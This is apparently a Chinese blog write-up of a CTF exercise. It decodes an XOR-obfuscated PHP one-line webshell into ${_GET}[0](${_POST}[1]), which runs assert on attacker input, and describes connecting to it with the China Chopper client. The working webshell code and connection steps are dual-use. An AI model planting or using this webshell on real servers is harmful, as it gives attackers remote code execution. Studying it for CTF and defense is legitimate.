变种一句话木马

墨者学院有一道例题
在这里插入图片描述
在这里插入图片描述
我们打开网站发现了一串php代码

<?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?>

看着很乱里面用了好多异或运算,但我们只需要打印出变量的值然后拼接在最后一句代码中即可

${$__}[!$_](${$___}[$_]); 
<?php @$_++;
$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");
$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");
//${$__}[!$_](${$___}[$_]); 
echo $_;
echo " ";
echo $__;
echo " ";
echo $___;
?>

打印结果如下
1 _GET _POST
及可知

$_=1
$__=_GET
$___=_POST

则整理最后一句得到一句话代码

${_GET}[0](${_POST}[1]);

构造ip/?assert=0
用菜刀连接
密码是1

${$__}[!$_](${$___}[$_]); 

主要是根据这一句来说的。
PHP会求得位于{}之间的表达式的值,并将这个值作为一个变量名。
前边通过对特殊字符的异或操作,最终得到_GET和_POST
这两个数组属于特殊数组,他们是像服务器传递数据用的
所以一般网站会对这两个数组进行设置,不让人为修改。
使用这个就绕开了网站对这两个数组进行的设置。然后修改数组。
提交参数0=assert,代码就变成了 <?php assert($_POST[1]); ?>

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值